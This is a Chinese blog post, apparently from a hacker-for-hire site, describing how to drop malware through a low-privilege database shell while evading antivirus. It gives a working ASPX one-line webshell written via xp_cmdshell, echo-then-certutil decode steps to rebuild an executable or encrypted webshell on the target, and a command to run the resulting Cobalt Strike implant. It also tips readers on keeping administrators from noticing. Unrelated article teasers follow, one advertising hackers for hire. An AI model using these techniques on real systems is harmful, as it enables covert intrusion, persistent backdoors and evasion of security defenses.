文件上传的一个骚操作(低权限+bypassAV)

访客4年前关于黑客接单574

各位在渗透中是否遇见过这个问题:

虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。

本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。

话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:

其中包括杀软或某狗、某盾:

此时下载文件的各种命令均被拦截:

bitsadmin:

certutil证书:

还会被杀软报警:

powershell也会被彻底封杀:

尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)

而在这种环境下可在有权限写入的前提下尝试写入一句话木马:

xp_cmdshell 'echo? ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\\WWW\\bmfx.aspx'

但也存在被某狗、WAF杀掉的可能。

此时,骚操作上场。

windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码:

本地:
Certutil -encode artifact.txt artifact.exe

或指定路径:
Certutil -encode d:\artifact.txt d:\artifact.exe

将txt文本使用echo命令:

echo sfAFASFAsfasgasdf………>>d:\1.txt

写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件):

Certutil -decode art.txt art.exe
或:
Certutil -decode d:\art.txt d:\art.exe

后续可在命令中执行exe上线:

cmd.exe /c art.exe

重点是:本地解码编码操作不会触发杀软拦截行为!

此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例):

可在web站点写入文件后访问txt查看写入有无偏差:

还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长:

此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。

相关文章

狂心氏族日常(狂心氏族日常战争的工具怎么做)

楼上错了。每天只有3个任务可接,其中一个固定是抓鸡任务。另外两个则随机选择,有卡塔克的愤怒、雷雨之力、日灼之力、战争工具、第一滴血、狂心的。 神谕者和狂心的崇拜奖励不同。一个可以买7天孵化的蛋能开出4...

幸福到万家根据什么改编的 幸福到万家大结局是什么

幸福快乐到万家和是取材于《秋菊打官司》,但在內容上面有非常大的转变,是叙述女士成长的经历,由李易峰出演,那麼,幸福快乐到万家和结局是啥?下边我就而言说。 幸福快乐到万家和依据哪些改写的 这一部剧本...

手机视频抠像处理教学,一款APP就搞定

说到巧影APP,很多人只了解它是一款手机拍摄视频解决专用工具,可是却不容易应用。假如你必须开展视频抠像解决,能够依靠巧影APP的“饱和度键”来帮助,操作步骤以下。 怎样运用巧影制作视频抠像实际效果?...

猴头菇真的能治疗胃病吗?猴头菇对胃病治疗效

猴头菇真的能治疗胃病吗?猴头菇对胃病治疗效

自古以来,猴头菇就被推崇为“养胃山珍”,改善胃肠道功能效果显著。现代医学研究表明,猴头菇对胃病反复发作的元凶——幽门螺旋杆菌(HP)有较好的抑制作用,体现了良好的“治养功效”,对消化不良、胃病和神经衰...

乳山进口冻猪肉制品新冠检测阳性-乳山猪肉新冠

相信大家都有注意到经常就有在进口冷冻食品上发现新冠检测阳性,近日据最新消息报道乳山进口冻猪肉制品新冠检测阳性,这让大家很是好奇进口冻猪肉制品还能吃吗,在之后如果购买进口冷冻食品要如何进行处理呢,接下来...

先办事黑客在线接单(网上找黑客接单是否可信)?

网上想找一个先办事后收费的黑客是否可信,随着互联网信息的加速发展,好多的需求在网上找在线接单黑客,那么网上找到的接单的黑客是否有可信度呢? 先办事黑...